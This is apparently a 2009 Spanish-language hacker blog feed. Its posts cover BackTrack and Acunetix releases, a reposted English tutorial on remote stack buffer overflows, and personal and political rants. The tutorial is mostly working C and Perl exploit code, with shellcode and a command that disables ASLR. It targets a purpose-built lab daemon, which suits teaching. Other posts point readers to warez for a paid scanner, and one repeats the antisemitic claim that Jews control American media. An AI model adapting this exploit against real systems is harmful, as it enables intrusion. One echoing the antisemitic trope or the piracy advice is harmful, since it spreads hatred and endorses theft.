H4x0r Security Blog

BackTrack 4 Pre-Final Lanzada

noreply@blogger.com (r3b1rth X) — Fri, 19 Jun 2009 23:55:27 PDT

Todavia no es la version final ni nada por el estilo pero si hay un poco de avanze en el lanzamiento de la final.

El Gran Equipo de Remote Exploit a Anunciado El Lanzamiento de la Pre-Final De Este Maravilloso Sistema Operativo (Suite De Pentesting) ...Descrita como la mejor herramienta It en el mercAdo asi como lo mejor que puede tener un auditor de sistemas en sus manos sin nesesidad de agregar, o descargar aditivo si ya por si viene todo instalado.

Ya como anuncian los desarrolladores y como se hizo con la beta por favor reportes de bugs y comportamiento raro reportenlo ya que de esa manera se le da la mano a los desarrolladores a hacer los arreglos correspondientes para la version final.

para una lista de los cambios pueden descargar el PdF Aqui con un resumen de los arreglos y cambios de esta version Aqui .

Y para descargar la live cd pueden hacerlo desde Aqui, que es una Imagen .Iso DvD.

Los Sums De la Iso Pueden Encontrarlos Aqui Md5sum y sha256sum .

Por este medio Agradecer al Equipo De Remote-Exploit:
Max Moser
Mati Aharoni
Filip Waeytens
Joshua D. Abraham
y no puede faltar a un gran amigo
J. Martin Bos (pureh@te)

=====================================
gracias mi gente y esperemos a que salga la final mientras tanto prueben con esa...

salu2

Acunetix 6.5 Lanzado Scanner De Vulnerabilidades

noreply@blogger.com (r3b1rth X) — Fri, 19 Jun 2009 11:00:33 PDT

Ya saben que siempre tengo una guerra en contra de los scanners automatizados y mas aun en la plataforma de la mierda de Sistema Operativo Windows...pero cumplo al menos con dar la noticia.

y el Acunteix 6.5 fue lanzado supuestamente fueron arreglado y corregidos algunos bugs que tenia y se le hicieron una que otra mejora.

yo personalmente no lo e probado ni nada asi que realmente no puedo indicarles como es su performance en los servidores

tiene algunas cosas nuevas como recargar las paginas ey darle replay estilo live http headers o algo similar xD.

se le agregaron strings de sql injection para que todos los script kiddies que hay en la red se puedan divertir aun mas xD..asi como mas soporte para tomcat y otras aplicaciones webs realmente la interfaz no cambio practicamente es la misma que la pasada.

en fin mas herramientas para erradicar el elitismo de la la red o como dirian muchos enviandome mas mensajes

"es para hacer el trabajo mas facil,o para un auditor es una herramienta indispensable,los responsables de las auditorias IT saben que es lo mejor"

bla bla en fin pruebenla a ver lo mas lindo es el precio de la herramienta Aqui

pero nada que no se pueda conseguir por ahi como en warez bb o algo asi
salu2

Ak De Nuevo

noreply@blogger.com (r3b1rth X) — Fri, 24 Apr 2009 12:14:42 PDT

Bueno me estare dando la vuelta por aqui nuevamente ya que e estado muy ocupado recientemente con mi trabajo y mis funciones Mil.

gracias a los que se han preocupado por mi y han hechado sus bendiciones les agradezco de puro corazon.

a los "Haters" u Odiosos (que me odian) pues me pueden chupar mi gran verga,y conseguir una visa para que tengan 6 meses de ella xDDDDDDD lol sigan haciendo lo suyo que hago lo mio jajaja asi que ni se molesten y gasten energias en odiarme,me encantaria 2 minutos con cada uno de ellos que garantizadamente los OWNEO Facil.

y pues estare por aqui dandome la vueltita seguidamente les quiere...

blood_rec

" U Can Hate Me Now "
xDDDD

Remote Exploitation with C and Perl by Preddy [English]

noreply@blogger.com (r3b1rth X) — Thu, 19 Mar 2009 21:21:18 PDT

#RootShell Security Group#

Código:

-- Remote Exploitation with C and Perl by Preddy - RootShell Security Group

--[ Contents

1.1 - Goal
1.2 - Situation
1.3 - Vulnerable Daemon + Vulnerability analyses
1.4 - Payload/Code construction/analyses in C
1.5 - Payload/Code construction/analyses in Perl
1.6 - Conlusion
1.7 - Contact & Feedback

[1.1]--[ Goal

Hi, Preddy here , 17 year old turkish kid from holland,First of all sorry for my english , please do notify me of any spelling errors.
I would recommend you to read my previous tutorial about "Simple Buffer Overflows"
to avoid misunderstanding in this tutorial and to get a basic understanding of buffer overflows.
Our goal is to write two remote exploits , one in c and one in perl.
Both of the exploits, exploit a vulnerability in a small vulnerable daemon.
You would need perl installed(eg: ActivePerl for windows) and a compiler for c
(eg: cygwin for windows) you should have perl and a compiler package installed at your
linux distribution, you can install them with the following commands
(incase you haven't got it installed) :

To search for the perl package:

apt-cache search perl

then to install it:

apt-get install [perl-pkg-name]

you can do the same with the compiler package.

[1.2]--[ Situation

I have a laptop on my left side and a desktop on my right-hand side.
the laptop uses the following local ip address: 192.168.1.100
and the desktop uses: 192.168.1.101 as it's local ip address.
The laptop is the attacker in this situation and the desktop is our victim.
both run slackware 10.2 and have the VA patch turned off.

Turning the VA patch off:

cat /proc/sys/kernel/randomize_va_space
1
echo 0 > /proc/sys/kernel/randomize_va_space
cat /proc/sys/kernel/randomize_va_space
0

The desktop computer runs a vulnerable daemon on port 7500 which we have to exploit
and open its cd-rom drive with the payload. Once again it's a very basic stack overflow
and this should be a piece of cake for the average exploit writer but it's very
usefull for people who are just starting to write exploits and exploit buffer overflows.

[1.3]--[ Vulnerable Daemon + Vulnerability analyses

Our vulnerable daemon:

server.c
---

#include
#include
#include
#include
#include
#include
#include

#define LISTENPORT 7500

#define BACKLOG 10

#define MSG "Hello, how are you?"

int handle_reply(char *str)
{

char response[256];

strcpy(response,str);

printf("The client says \"%s\"\n",response);

return 0;

}

int main(int argc, char * argv[]) {
int sock, conn;
struct sockaddr_in my_addr, client_addr;
int sockopt_on = 1;
int sa_in_size = sizeof(struct sockaddr_in);
char reply[1024];

//get a socket
if ((sock = socket(AF_INET, SOCK_STREAM,0)) == -1) {
perror("socket");
exit(1);
}

//first zero the struct
memset((char *) &my_addr, 0, sa_in_size);

//now fill in the fields we need
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(LISTENPORT);
my_addr.sin_addr.s_addr = htonl(INADDR_ANY);

//bind our socket to the port
if (bind(sock,(struct sockaddr *)&my_addr, sa_in_size) == -1) {
perror("bind");
exit(1);
}

//start listening for incoming connections
if (listen(sock,BACKLOG) == -1) {
perror("listen");
exit(1);
}

while(1) {
//grab connections
conn = accept(sock, (struct sockaddr *)&client_addr, &sa_in_size);
if (conn == -1) {
perror("accept");
exit(1);
}

//log the connecter
printf("got connection from %s\n", inet_ntoa(client_addr.sin_addr));

//send a greeting
send(conn,MSG,strlen(MSG)+1,0);

//get the reply
recv(conn, reply, 1024, 0);

handle_reply(reply);

}

return 0;
}
---

This piece of code serves as a daemon and waits for people to connect,
on a successfull connection the server replies with a message and
waits for the user to reply back with his message.
The message get's stored in a buffer called 'reply' which can hold
1024 bytes of data.

the vulnerability lies in the handle_reply() function let's analyze it:

handle_reply()
---

int handle_reply(char *str)
{

char response[256];

strcpy(response,str);

printf("The client says \"%s\"\n",response);

return 0;

}
---

as you can see it has a response buffer which can hold 256 bytes of data
the reply message from the user gets copied in that buffer and the response
message is viewed at the server.

like this,

client:
---

telnet 192.168.1.101 7500
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
Hello, how are you?fine thanks how are you?

---

server:
---

got connection from 192.168.1.100
The client says "fine thanks how are you?
"
---

as you can see nothing special happens. But let's try to send a buffer which
is 272 bytes , which exceeds the buffersize of the response buffer in the handle_reply()
function.

[1.4]--[ Payload/Code construction/analyses in C

We want to send a 272 byte buffer to port 7500 of our victim (192.168.1.101)
so let's start by writing a simple piece of c code which can send 272 x A (0x41) to port
7500. Also don't forget to enable coredumps to analyze the overflow,

Enabling coredumps:

ulimit -c unlimited

Our overflow code:

send_overflow.c
---

/*

-- Send overflow (C version) written by Preddy

Part of Preddy's Remote Exploitation with C and Perl tutorial

Usage: ./send_overflow

Example: ./send_overflow 192.168.1.101

*/

/*
include headers which are required for a network connection
and other functionalities in the program
*/

#include
#include
#include
#include
#include
#include
#include

/*
define our remote port and the data which we are going to send
*/

#define REMPORT 7500
#define A 0x41

//Start with the program
int main(int argc,char **argv)
{

/* declare our variables */
int conn; //our connection variable, which will connect to the remote computer
int fd; // our socket file descriptor

//assign struct sockadd_in to remaddr
struct sockaddr_in remaddr;

//declare our payload buffer which will hold 272 bytes of data
char payload[272];

/*
check if the first commandline argument is given (the ip address)
if NOT print a message and exit
*/

if(!argv[1])
{

printf("Specify ip plz..\n");

exit(1);

}

/*
create the socket and also check for errors at creation
if an error is detected socket() will return -1
*/
if((fd = socket(AF_INET,SOCK_STREAM,0)) == -1)
{

perror("socket");

exit(1);

}

/*
this is going to overwrite the Extended Instruction Pointer
with 4 x 0x42 (BBBB -> 0x42 is also knows as B in its ascii form - http://www.lookuptables.com/)
*/

char *eip = "\x42\x42\x42\x42";

/*
fill our payload with 268 bytes of A (previously defined as 0x41)
*/

memset(payload,A,268);

/* fill the part after 268 bytes with our eip (BBBB - 0x42424242) */

memcpy(payload+268,eip,sizeof(eip));

/* connection information */
remaddr.sin_family = AF_INET; //domain
remaddr.sin_addr.s_addr = inet_addr(argv[1]); //remote connection address (our first argument - IP)
remaddr.sin_port = htons(REMPORT); //the remote port to connect to (previously defined as 7500)

/* this is where the actual connection take's place */

conn = connect(fd, (struct sockaddr_in *)&remaddr,sizeof(remaddr));

/* check the connection for errors as you know it returns -1 at errors */
if(conn < 0)
{

printf("Error: could not connect\n");
exit(1);
}

/* this is the part where our payload gets sent */

send(fd,payload,strlen(payload),0);

/* this is extra information which is displayed after sending the payload */

printf("Payload Size: %i\n",sizeof(payload));
printf("Payload Sent..\n");

}

---

Now we can start with compiling our program:

client:
---
gcc send_overflow.c -o send_overflow

./send_overflow 192.168.1.101
Payload Size: 272
Payload Sent..
---

server:
---

got connection from 192.168.1.100
The client says "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB"
Segmentation fault (core dumped)
bash-3.00# gdb -c core ./server
GNU gdb 6.3
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/tls/libthread_db.so.1".

Core was generated by `./server'.
Program terminated with signal 11, Segmentation fault.

warning: current_sos: Can't read pathname for load map: Input/output error

Reading symbols from /lib/tls/libc.so.6...done.
Loaded symbols for /lib/tls/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x42424242 in ?? ()
(gdb) i r eip
eip 0x42424242 0x42424242
(gdb)

---

as you see we have overwritten the extended intruction pointer with our own
eip which we constructed before in our payload (char *eip = "\x42\x42\x42\x42";)
and its overwritten with exacly BBBB

so now we have to place our shellcode in our payload and also our nopsled.
and finish a huge part of the exploit.

server_exploit.c
---

/*

-- Remote "eject cd-rom" exploit (C version) written by Preddy

Part of Preddy's Remote Exploitation with C and Perl tutorial

Usage: ./server_exploit

Example: ./server_exploit 192.168.1.101

*/

/*
include headers which are required for a network connection
and other functionalities in the program
*/

#include
#include
#include
#include
#include
#include
#include

/*
define our remote port and the data which we are going to send
*/

#define REMPORT 7500
#define NOP 0x90
#define A 0x41

//Start with the program

int main(int argc,char **argv)
{

//Our shellcode which ejects the cd-rom drive..

/*
* (linux/x86) eject cd-rom (follows "/dev/cdrom" symlink) + exit() - 40 bytes
* - izik
*/

char scode[] =

"\x6a\x05" // push $0x5
"\x58" // pop %eax
"\x31\xc9" // xor %ecx,%ecx
"\x51" // push %ecx
"\xb5\x08" // mov $0x8,%ch
"\x68\x64\x72\x6f\x6d" // push $0x6d6f7264
"\x68\x65\x76\x2f\x63" // push $0x632f7665
"\x68\x2f\x2f\x2f\x64" // push $0x642f2f2f
"\x89\xe3" // mov %esp,%ebx
"\xcd\x80" // int $0x80
"\x89\xc3" // mov %eax,%ebx
"\xb0\x36" // mov $0x36,%al
"\x66\xb9\x09\x53" // mov $0x5309,%cx
"\xcd\x80" // int $0x80
"\x40" // inc %eax
"\xcd\x80"; // int $0x80

/* declare our variables */
int conn; //our connection variable, which will connect to the remote computer
int fd; // our socket file descriptor

//assign struct sockadd_in to remaddr
struct sockaddr_in remaddr;

//declare our payload buffer which will hold 272 bytes of data
char payload[272];

/*
check if the first commandline argument is given (the ip address)
if NOT print a message and exit
*/

if(!argv[1])
{

printf("Specify ip plz..\n");

exit(1);

}

/*
create the socket and also check for errors at creation
if an error is detected socket() will return -1
*/

if((fd = socket(AF_INET,SOCK_STREAM,0)) == -1)
{

perror("socket");

exit(1);

}

/*
this is going to overwrite the Extended Instruction Pointer
with 4 x 0x42 (BBBB -> 0x42 is also knows as B in its ascii form - http://www.lookuptables.com/)
*/

char *eip = "\x42\x42\x42\x42";

/*

Shellcode size: 40 bytes

272 bytes used to overwrite eip with 0x42424242

eip = 4 bytes

272 -4 = 268
268 - 40 = 228
Nopsled = 228 bytes

*/

memset(payload,NOP,228); //construct the nopsled
memcpy(payload+228,scode,sizeof(scode)); //place our shellcode after the nopsled
memcpy(payload+268,eip,sizeof(eip)); //place eip after our shellcode

/*

structure:

[NOPSLED - 228 BYTES] + [SHELLCODE - 40 BYTES] + [EIP - 4 BYTES] = 272 BYTES

*/

/* connection information */
remaddr.sin_family = AF_INET; //domain
remaddr.sin_addr.s_addr = inet_addr(argv[1]); //remote connection address (our first argument - IP)
remaddr.sin_port = htons(REMPORT); //the remote port to connect to (previously defined as 7500)

/* this is where the actual connection take's place */

conn = connect(fd, (struct sockaddr_in *)&remaddr,sizeof(remaddr));

/* check the connection for errors as you know it returns -1 at errors */
if(conn < 0)
{

printf("Error: could not connect\n");
exit(1);
}

/* this is the part where our payload gets sent */

send(fd,payload,strlen(payload),0);

/* this is extra information which is displayed after sending the payload */

printf("Payload Size: %i\n",sizeof(payload));
printf("Payload Sent..\n");

}

---

Let's start compiling our exploit,

client:
---
gcc server_exploit.c -o server_exploit

./server_exploit 192.168.1.101
Payload Size: 272
Payload Sent..

---

server:
---

bash-3.00# ./server
got connection from 192.168.1.100
The client says "jX1?Qhdromhev/ch///d??ð6f? S? @?BBBB"
^[[?1;2cSegmentation fault (core dumped)
bash-3.00# gdb -c core ./server
GNU gdb 6.3
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/tls/libthread_db.so.1".

Core was generated by `./server'.
Program terminated with signal 11, Segmentation fault.

warning: current_sos: Can't read pathname for load map: Input/output error

Reading symbols from /lib/tls/libc.so.6...done.
Loaded symbols for /lib/tls/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x42424242 in ?? ()
(gdb)
(gdb) i r eip
eip 0x42424242 0x42424242
(gdb) x/1000xb $esp
0xbffff2b0: 0x02 0x00 0xff 0xbf 0xc0 0xf2 0xff 0xbf
0xbffff2b8: 0x00 0x04 0x00 0x00 0x00 0x00 0x00 0x00
0xbffff2c0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2c8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2d0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2d8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2e0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2e8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2f0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff2f8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff300: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff308: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff310: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff318: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff320: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff328: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff330: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff338: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff340: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff348: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff350: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff358: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff360: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff368: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff370: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff378: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff380: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff388: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90

---

As you can see we have overwritten the extended instruction pointer once again
and you can see our nopsled above in memory

Let's pick a random address from the nopsled,

0xbffff2f8

write it in little-endian format (more info: http://www.answers.com/topic/endianness)

EIP:

\xf8\xf2\xff\xbf

and let's replace the old EIP with the new one in our "server_exploit.c" program

so:

char *eip = "\x42\x42\x42\x42";

becomes

char *eip = "\xf8\xf2\xff\xbf";

and let's recompile the program,

gcc server_exploit.c -o server_exploit

client:
---

./server_exploit 192.168.1.101
Payload Size: 272
Payload Sent..
---

server:
---
bash-3.00# ./server
got connection from 192.168.1.100
The client says "jX1?Qhdromhev/ch///d??ð6f? S? @?????"
^[[?1;2cbash-3.00# 1;2c
---

and yes, my cd-rom drive ejected....

as you can see we have managed to successfully exploit a remote
buffer overflow by using c code. Some people have allot of problems with
c , they find it hard or they are to lazy to learn it :PpPppP

Perl is allot easier to learn in my opinion and would be confortable for
some people.The next section will use Perl to exploit this vulnerability
and open the cd-rom drive of the computer.

[1.5]--[ Payload/Code construction/analyses in Perl

Let's start again by sending a 272 byte buffer to the server in Perl,

send_overflow.pl
---

#!/usr/bin/perl

####################################################################
#
#-- Send overflow (Perl version) written by Preddy
#
# Part of Preddy's Remote Exploitation with C and Perl tutorial
#
# Usage: perl send_overflow.pl
#
# Example: perl send_overflow.pl 192.168.1.101
#
####################################################################

#IO::Socket for network connections
use IO::Socket;

#the ip address is our first commandline argument also known as ARGV[0] in Perl
$ip = $ARGV[0];

#our payload which is 272 bytes of A (0x41,x41)
$payload = "\x41"x272;

#view a message if no ip address is given
if(!$ip)
{

die "Specify ip plz..\n";

}

#the remote port to connect to
$port = '7500';

#the connection protocol to use
$protocol = 'tcp';

#create the actual network connection
#and print an error message if it's not possible to create a socket
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
PeerPort=>$port,
Proto=>$protocol,
Timeout=>'1') || die "Could not create socket\n";

#send the payload to the remote computer
print $socket $payload;

#close the connection
close($socket);

---

Let's start by running the script without any arguments,

perl send_overflow.pl
Specify ip plz..

And let's send the payload (272 x A - 0x41)

client:
---
perl send_overflow.pl 192.168.1.101

---

server:
---

bash-3.00# ./server
got connection from 192.168.1.100
The client says "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB"
Segmentation fault (core dumped)
bash-3.00# gdb -c core ./server
GNU gdb 6.3
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/tls/libthread_db.so.1".

Core was generated by `./server'.
Program terminated with signal 11, Segmentation fault.

warning: current_sos: Can't read pathname for load map: Input/output error

Reading symbols from /lib/tls/libc.so.6...done.
Loaded symbols for /lib/tls/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x41414141 in ?? ()
(gdb)
(gdb) i r eip
eip 0x41414141 0x41414141
---

as you can see we have overwritten eip ,

now let's construct our payload

[NOPSLED - 228 bytes] + [SHELLCODE - 40 bytes] + [EIP - 4 bytes] = 272 bytes

we can just use the same payload from the C section
in it's perl form.

server_exploit.pl
---
#!/usr/bin/perl

####################################################################
#
#-- Server Exploit (Perl version) written by Preddy
#
# Part of Preddy's Remote Exploitation with C and Perl tutorial
#
# Usage: perl server_exploit.pl
#
# Example: perl server_exploit.pl 192.168.1.101
#
####################################################################

#IO::Socket for network connections
use IO::Socket;

#the ip address is our first commandline argument also known as ARGV[0] in Perl
$ip = $ARGV[0];

#our nopsled
$nopsled = "\x90"x228;

#our shellcode which opens the remote cd-rom drive - 40 bytes (thanks to izik)
$shellcode = "\x6a\x05". # push $0x5
"\x58". # pop %eax
"\x31\xc9". # xor %ecx,%ecx
"\x51". # push %ecx
"\xb5\x08". # mov $0x8,%ch
"\x68\x64\x72\x6f\x6d". # push $0x6d6f7264
"\x68\x65\x76\x2f\x63". # push $0x632f7665
"\x68\x2f\x2f\x2f\x64". # push $0x642f2f2f
"\x89\xe3". # mov %esp,%ebx
"\xcd\x80". # int $0x80
"\x89\xc3". # mov %eax,%ebx
"\xb0\x36". # mov $0x36,%al
"\x66\xb9\x09\x53". # mov $0x5309,%cx
"\xcd\x80". # int $0x80
"\x40". # inc %eax
"\xcd\x80"; # int $0x80

#our extended instruction pointer which we use to overwrite the remote eip
$eip = "\xf8\xf2\xff\xbf";

#we construct our full payload here
$payload = $nopsled.$shellcode.$eip;

#view a message if no ip address is given
if(!$ip)
{

die "Specify ip plz..\n";

}

#the remote port to connect to
$port = '7500';

#the connection protocol to use
$protocol = 'tcp';

#create the actual network connection
#and print an error message if it's not possible to create a socket
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
PeerPort=>$port,
Proto=>$protocol,
Timeout=>'1') || die "Could not create socket\n";

#send the payload to the remote computer
print $socket $payload;

#close the connection
close($socket);

---
Let's run the perl script again:

perl server_exploit.pl 192.168.1.101

and yes! my cd-rom drive opened again :) what a miracle.. :PpPppP
(kids: don't irritate your father's box by continuesly opening his cd-rom drive)

[1.6]--[ Conclusion

Well we have learned to construct payloads and write exploits which
use those payloads. A good thing to do is to learn more about different
types of overflows and their exploitation methods, also practicing
different types of programming languages could be usefull.

[1.7]--[ Contact & Feedback

You can contact me by,

IRC:

FREENODE: ##c,##linux,##php,##security,##slackware,#fluxbox,#perl,#remote-exploit,#tor
MILW0RM: #milw0rm
GSO: #gso-chat
STS: #lecture,#social

IM , msn : preddy @hushmail.com

EMAIL, : m4ilinglists @gmail.com

please notify me of any mistake's which I might have made :)
or any other comments..

Cya around guyz,

Preddy

lol

Lanzada Beta De Backtrack4 Basada En Ubuntu :D

noreply@blogger.com (r3b1rth X) — Tue, 24 Feb 2009 15:53:04 PST

Aunque no es una gran noticia ni tampoco nueva ya fue lanzada la version nueva de Backtrack4 en su edicion beta...

yo ya la descargue personalmente y el cambio de la base distro de Slackware (slax) a Debian
(ubuntu) no es muy favorecido de mi parte...

por lo que puedo analizar que los desarrolladores de backtrack solo querian implementar mas al usuario "newbie" o usuario normal y la compatibilidad de hardware que carecia la revision pasada con su nuevo kernel...

cuenta con repositorios de la comunidad "Ubuntu" y su gestor de paquetes synaptic aunque para los que no le gustan el gestor todavia existe "apt" en fin la orientacion es que los desarrolladores tienen miras a competir con las distribuciones mas populares...

en este caso sigue siendo una distribucion de linux live orientada a la auditoria de sistemas/wireless/lan/servidores/passwords/forense para mi una buena distribucion si no la mejor para estos fines de auditorias de seguridad...

muchos profesionales IT opinan que es la mejor suite de herramientas para estos fines y yo no difiero con ellos...

desde la practica del "Ethical Hacking" (Hacking Etico) hasta practicas Script Kiddies.
o rituales de Lammers en fin pueden usarlo todo tipo de personas no significa que usarla te convierte en alguno de esos terminos en esta revision buscaron hacerla un poco mas amigable para el usuario normal..

aunque cabe recalcar que sigue siendo una suite y conjunto de herramientas orientadas al IT o auditorias..

esta revision cuenta con algunos cambios como:

Soporte para tarjetas pico e10 y e12 (para UMPCs)
Posibilidad de arrancar por red mediante PXE
Versión limitada de la herramienta SAINT Exploit
Versión libre de Maltego
Actualizaciones en los drivers de tarjetas wireless, necesarios para auditorías
Soporte RFID
Nuevas herramientas de seguridad.

Aunque no son muchas los cambios no son muy notables referentes a la organizacion del menu sigue siendo kde 3.5 y no la ultima version 4.0 (los rumores son que para la version final lo sera) se le agregaron solo algunas herramientas...

en fin igual los desarrolladores De Remote Exploit hicieron nuevamente un gran trabajo con la mejor live cd de seguridad que existe (Hacking)...

y esperamos que cuando se realize el lanzamiento de la version final se aun mas prometedora,vuelvo y recalco que no favorezco mucho su cambio de slax a ubuntu pero en fin los desarrolladores de dicha live cd hacen su trabajo de manera excelente...

para obtener Backtrack 4 la pueden obtener desde su sitio web :
Version Dvd Aqui.
Version Para Vmware Aqui.
Imagen Para Adherir Al Cd Label.

Traeremos actualizaciones siguientes al lanzamiento de la version final

Pd: La lista de herramientas de Backtrack4 la pueden conseguir aqui LINK

salu2

Conectividad [Problema Resuelto]

noreply@blogger.com (r3b1rth X) — Tue, 24 Feb 2009 13:30:49 PST

Ya llegue al infierno aqui las temperaturas varian notablemente de 40 grados suben a la hora pico a los 100 grados :D...

en fin ni que hablar de la conexion de internet aparte de que tienen censurados la mayoria de los sitios que conozco si posees tu tarjeta de internet debes hacer miles de cosas para conectarte...

malditos en fin ya puedo conectarme y a poner al dia mi maldito blog ya que por si es mi unica herramienta que poseo para entretenerme o expresar lo que estoy pasando con esta nueva etapa en mi vida...

1st Squad,3rd Platoon,Echo Company 2-54 U.S.M.C

Inyeccion DLL En Windows Vista

noreply@blogger.com (r3b1rth X) — Tue, 27 Jan 2009 16:07:57 PST

An insight on how to inject a dynamic library (DLL) into a 32 bit process in Windows Vista with the use of Remote Threads
and taking into consideration the Address Space Layout Randomization (ASLR). The sample code used is written in
assembly language (MASM32) using the WinAsm IDE. It should give you a better understanding on how dynamic libraries
can be injected.

Un Analisis Mas A Fondo De Como Injectar Una Libreria Dinamica (Dll) En Windows Vista.

Es Un Archivo Pdf En Ingles Y muy Explicado :D

http://rapidshare.com/files/190409926/275.pdf.html

Seguira El Abuso De Israel (ZIONISTAS) [imagenes Graficas]

noreply@blogger.com (r3b1rth X) — Mon, 12 Jan 2009 18:54:52 PST

[Contenido Grafico De Imagenes Discrecion]

Bueno a raiz de un usuario en el foro de e-r00t que hizo comentarios hacia mi persona afirmando que yo tenia vinculos con terroristas o que una celula terrorista me ayudaba financieramente para yo practicar ataques informaticos..pos levanto algo que si es real despues de dichos comentarios falsos...

si condeno los ataques Israelitas hacia los palestinos en Gaza y El Libano....Los Judios siguen con su Terrorismo sitematico y acusa al grupo extremista "Hamas" islamico de haber roto el acuerdo de cese al fuego del 4 de noviembre...

pero realmente "Hamas" violo ese acuerdo? es muy dificil de determinar ya que como es de esperarse los judios controlan los medios americanos entonces a que resulta esto..

maquillan la informacion y Israel sigue con su terrorismo con licencia en tierra palestina/...

lo peor de todo se hacen las victimas benditos del holocausto que les causo hitler en aquellos tiempos cosa que yo no apoyo pero igual condeno lo que hacen los judios ahora con nuestros hermanos palestinos...

entonces sera real que es lo que pasa simplemente se desquitan de los que le hizo la Alemania Nazi de un pueblo inferior?....

estas son las lluvias de terror que israel le da al pueblo de palestina?
aparte de su propaganda falsa de calumnias mientras usan a los palestinos como escudos humanos que manera tan etica de pelear su guerra mientras gastan miles de millones en armamento de mano de los Americanos ...

por que Israel no deja su mensaje de terror y acusa a sus vecinos de ser terroristas?

si y como lloran cuando pierden uno de los suyos...

pero la realidad es que nadie dice nada por las atrocidades que ellos hacen al pueblo palestino,, los asesinatos de ninos
y de mujeres palestinas y de civiles a todo dar...

entonces cuando alguien en el jodido mundo tendra la conciencia de parar a estos idiotas ..

no pero hay muchos ignorantes, que piensan "que se jodan los terroristas" ..pero realmente si un monton de tipos te vienen a dar una bofetada , no te defenderias? o te quedarias de manos cruzadas o si mejor aun un solo tipo te viene a golpear en tu propia casa? no te defenderias?

Israel son los que suprimen este pueblo destruyendole sus casas,sus escuelas,sus hospitales y su vida solo por ser territoriales,...

es lo mismo que ellos hiceron con egipto para ocupar mas su territorio.. lo que pasa en este caso es que los palestinos no se dejan...

Paren la maldita violencia en palestina ellos solo quieren su estado independiente...

ya breve les traere mas info de todo esto y si lo digo asi libremente:

Apoyo a la liberacion de palestina y el reconocimiento de un Estado Palestino Independiente...

ninguna celula terrorista me paga por hacer mensajes,ni por tener contactos arabes,turkos o palestinos...

Burp Suite v1.2 Liberada - Aplicacion para Auditar y Ataque Web

noreply@blogger.com (r3b1rth X) — Sat, 03 Jan 2009 18:26:04 PST

